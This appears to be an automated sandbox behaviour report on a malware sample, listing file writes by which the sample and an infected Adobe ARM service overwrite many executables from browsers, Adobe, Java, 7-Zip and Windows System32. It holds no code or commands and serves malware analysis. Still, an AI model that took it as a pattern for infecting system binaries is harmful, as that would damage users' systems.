Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
